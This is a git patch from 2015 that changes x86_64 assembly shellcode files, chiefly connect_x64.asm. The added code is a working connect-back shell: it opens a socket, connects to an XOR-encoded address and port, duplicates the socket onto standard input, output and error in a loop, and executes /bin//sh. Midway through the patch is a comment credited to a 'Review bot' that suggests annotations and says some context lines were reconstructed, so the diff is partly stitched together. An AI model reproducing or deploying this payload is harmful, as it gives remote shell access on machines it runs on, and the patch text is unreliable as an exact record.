From ba60e5853f3c655245229c7abf1a8e25922a127a Mon Sep 17 00:00:00 2001
From: toni
Date: Wed, 23 Sep 2015 12:39:54 +0200
Subject: x86_64 shellcode + funcjmp_ext

---
 shellcode/connect_x64.asm | 50 ++++++++++++++++++++++++++---------------------
 shellcode/socket_x64.asm | 2 +-
 2 files changed, 29 insertions(+), 23 deletions(-)
(limited to 'shellcode')

diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm
index d1e0ef2..829a7fd 100644
--- a/shellcode/connect_x64.asm
+++ b/shellcode/connect_x64.asm
@@ -17,32 +17,38 @@ mov rdi,rax
 xor rax,rax
 push rax
 push rax
-push 0x1011116E ; XOR-encoded -> 127.0.0.1
-xor dword [rsp],0x11111111
-push word 0x2814 ; push tcp port (XOR-encoded -> 1337)
-xor word [rsp],0x1111 ; decode tcp port
-push word 0x2 ; 0x2 -> AF_INET
-mov rsi,rsp
+push dword 0x1011116E ; XOR-encoded -> 127.0.0.1
+xor dword [rsp],0x11111111
+push word 0x2814 ; push tcp port (XOR-encoded -> 1337)
+xor word [rsp],0x1111 ; decode tcp port
+push word 0x2 ; 0x2 -> AF_INET
+mov rsi,rsp
 mov dl,0x10
 mov al,42
 syscall
 
 ; dup2()
-;mov rbx,rdi
-;xor rdi,rdi
-;xor rsi,rsi
-;xor rcx,rcx ; zero out count register
-;mov cl,0x3 ; loopcount
-;dupes:
-;xor eax,eax ; zero out eax
-;mov al,33 ; dup2() syscall
-;dec cl
-;mov rdi,rcx
-;mov rsi,rbx
-;syscall
-;inc cl
-;loop dupes
+xor rdx,rdx
+mov dl,0x3
+dupes:
+mov rsi,rdx
+dec rsi
+xor rax,rax
+mov al,0x21
+syscall
+dec dl
+jnz dupes
 
-; exec()
+; exec
+mov rax,0x68732f6e69622f2f ; string 'hs/nib//'
+push rax
+xor rax,rax
+mov byte [rsp + 8],al
+mov rdi,rsp
+push rax
+mov rsi,rsp
+push rax
+mov rdx,rsp
+mov al,0x3b
+syscall
 
-; exit()
diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm
index 1ec36b0..885c0fd 100644
--- a/shellcode/socket_x64.asm
+++ b/shellcode/socket_x64.asm
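Review bot: The new `dupes:` loop and the `; exec` block in connect_x64.asm carry no per-line comments, while what appears to be the same exec sequence in socket_x64.asm (second hunk of this patch) documents each line (`; null-terminate the string`, `; arg1 = pointer to string`, `; arg2 = null`); the two files should be annotated alike. At minimum name the syscall selectors, as the removed commented-out block did for 33, e.g. `mov al,0x21 ; 0x21 = dup2` and `mov al,0x3b ; 0x3b = execve`, and note the loop invariant on `dupes:`, e.g. `; dl = remaining count (3..1), rsi = dl-1 = target fd`. `mov byte [rsp + 8],al` stores one byte above the pushed string, i.e. into the sockaddr buffer built earlier in the hunk; a comment such as `; null-terminate; clobbers the now-unused sockaddr byte above` records that this line must stay after the connect syscall. The blank context lines in this hunk were reconstructed from the @@ line counts after the patch had been collapsed onto a single line, so their exact positions are inferred.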
@@ -57,7 +57,7 @@ jnz dupes
 mov rax,0x68732f6e69622f2f ; string 'hs/nib//'
 push rax ; push the string onto the stack
 xor rax,rax
-mov byte [rsp + 8],al ; null-terminate the string
+mov byte [rsp + 8],al ; null-terminate the string
 mov rdi,rsp ; arg1 = pointer to string
 push rax ; arg2 = null
 mov rsi,rsp
-- 
cgit v1.2.3